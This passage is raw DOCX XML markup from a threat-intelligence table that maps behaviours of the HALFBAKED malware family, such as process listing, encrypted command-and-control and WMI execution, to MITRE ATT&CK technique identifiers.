          <w:p w14:paraId="1B0E2566" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5382055B" w14:textId="1FD402EF" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5626363A" w14:textId="4BD4077D" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12FB3174" w14:textId="1E3A040C" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00E639A2" w14:paraId="11E36BEA" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="586DD85A" w14:textId="5F917004" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0911C745" w14:textId="44E5E54E" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0007 </w:t>
            </w:r>
            <w:r w:rsidR="00B33956">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00B33956">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A165BFD" w14:textId="04FF3DC9" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1057 </w:t>
            </w:r>
            <w:r w:rsidR="00183E12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00183E12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D3BC0C" w14:textId="24997280" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0081790D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="395DD73D" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C1B807C" w14:textId="23813FF3" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53E1E89B" w14:textId="69C7C595" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA570C1" w14:textId="390453E3" w:rsidR="004F28B4" w:rsidRPr="00E639A2" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="004F28B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">HALFBAKED </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009B3A83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>processList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009B3A83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>: Send list of process running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00770F8D" w:rsidRPr="00770F8D" w14:paraId="179031A1" w14:textId="77777777" w:rsidTr="007A4104">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0429C0CB" w14:textId="6666ABFF" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D5F134" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A934057" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1573 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E182B63" w14:textId="499CF045" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0081790D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40455061" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E2963CB" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E63252" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E2549E2" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B3A83" w:rsidRPr="00B857D7" w14:paraId="5E489D69" w14:textId="77777777" w:rsidTr="007A4104">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44B0B7C7" w14:textId="591DCA89" w:rsidR="009B3A83" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A871719" w14:textId="77777777" w:rsidR="009B3A83" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B8DF0B3" w14:textId="77777777" w:rsidR="009B3A83" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F57DBF7" w14:textId="1DD3CE11" w:rsidR="009B3A83" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0081790D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789E83DE" w14:textId="77777777" w:rsidR="009B3A83" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7435E67D" w14:textId="77777777" w:rsidR="009B3A83" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52D83994" w14:textId="0516C861" w:rsidR="009B3A83" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C25B975" w14:textId="77777777" w:rsidR="009B3A83" w:rsidRPr="00B857D7" w:rsidRDefault="009B3A83" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E02B5D" w:rsidRPr="00487795" w14:paraId="3EE1F082" w14:textId="77777777" w:rsidTr="007A4104">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07B906B6" w14:textId="16E26CD7" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00E02B5D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60431B3A" w14:textId="57DCEB85" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00E02B5D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r w:rsidR="00B33956">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B33956">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0978793C" w14:textId="7D03E35C" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00E02B5D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1047 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E02B5D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows Management Instrumentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DCF9B41" w14:textId="31ED7C80" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00E02B5D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0081790D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5084101D" w14:textId="77777777" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00E02B5D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756AF9FB" w14:textId="77777777" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00E02B5D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2404FD09" w14:textId="2E5ECB05" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00C40195" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
